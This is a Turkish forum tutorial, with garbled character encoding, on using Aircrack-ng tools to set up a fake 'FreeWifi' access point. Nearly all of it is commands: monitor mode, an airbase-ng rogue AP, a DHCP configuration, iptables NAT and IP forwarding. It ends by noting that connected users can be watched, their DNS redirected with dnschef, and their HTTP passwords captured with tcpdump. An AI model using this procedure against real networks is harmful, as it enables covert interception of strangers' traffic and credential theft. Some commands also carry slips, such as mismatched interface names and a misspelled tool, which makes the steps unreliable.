
Aircrack-ng Nedir?
Aircrack-ng, bir paket dinleyici veya WEP ve WPA/WPA2 þifrelerini kýran bir dedektör diyebiliriz. Aircrack aracýný kullanýrken bazý öðrenmemiz gereken komutlar var. Bunlar;
"airodump-ng" , "aireplay-ng" , "aircrack-ng" ve "airdecap-ng" bugün ki konumuzda göreceðimiz komutlar.

Aircrack ile Sahte Kablosuz Að Oluþturma
Terminalimizi açýp ilk komudumuz ile baþlayalým.
Kod:
ifconfig


WLAN14 Bizim að adaptörümüz demektir.
Þimdi sahte eriþim noktasý için að adaptörümüzü kullanalým ve airmon-ng aracýmýz ile sanal bir arayüz oluþturalým ve baðlantýmýzý baþlatalým.

Kod:
airmon-ng start wlan14

Artýk dinleme yapmayý veya sahte eriþim noktasý yapabilmek için að adaptörümüzu kullanabilirsiniz,
airmon-ng aracýyla sanal bir arayüz oluþturup ilgili baðlantýmýzý baþlatalým,
mon1 adýnda bir arayüz oluþtu test edelim bakalým etrafdaki kablosuz aðlarýmýz gözüküyor mu, Fakat onu yapmadan hata vermemesi için þu komutu yazalým,

Kod:
modprobe r8187se

Ardýndan mon1 arayüzümüzü test edelim,

Kod:
airodum-ng mon1

Bu aða baðlanýcak kiþilere ip verebilmek adýna DHCP sunucumuzu kuruyoruz

Kod:
apt-get install dhcp3-server

Yüklenmezse manuel bir þekilde indirmek için bu dosyayý indirin http://oemsources.volumio.org/brysto...-server.tar.gz
Ardýndan bu komudu yazalým

Kod:
tar -xvf isc-dhcp-server.tar.gz -C /test

.dep paketimiz yüklendikten sonra sistemi sonra yeniden baþlatalým.

Kod:
dpkg -i isc.dhcp.server.dep


Kod:
reboot

Sonra IP aralýðýný verebilmek için dhcp servisimizin conf dosyasýný düzenleyelim

Kod:
nano /etc/dhcp3/dhcpd.conf

ve direkt bu kýsmý copy-paste yapýn.
Alıntı:
ddns-update-style ad-hoc; //bu alaný daha sonradan servis çalýþmassa hata verirse kaldýracaðýz.
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
Ardýndan airbase-ng komuduyla kablosuz aðý oluþturalým.

Kod:
airbase-ng -e FreeWifi -c 11 -v wlan1 &

at0 isimli bir sanal arabirim indirelimi

Kod:
ifconfig at0 up

Kod:
ifconfig at0 10.0.0.254 netmask 255.255.255.0

route komutunu yazalým,

Kod:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

iptable ayarlarýmýzý yapalým,

Kod:
iptables --flush

Kod:
iptables --table nat --flush

Kod:
iptables --delete-chain


Kod:
iptables -P FORWARD ACCEPT

gelecek baðlantýlarý yönlendirelim.

Kod:
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

DHCP serverimizi baþlatalým,

Kod:
dhcpd -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

geçiþ yapacak IP'lerimizi yönlendirelim.

Kod:
echo "1" > /proc/sys/net/ipv4/ip_forward
Bu adýmlara kadar geldikten sonra ilgili testleri yapýn. Bu sayede bir kullanýcýnýn IP'sini alýp onu izleyebilirsiniz dnschef ile dns yönlendirmesi yaparak ve tcpdump ile de http trafiðinde parola bilgilerini alabiliriz.
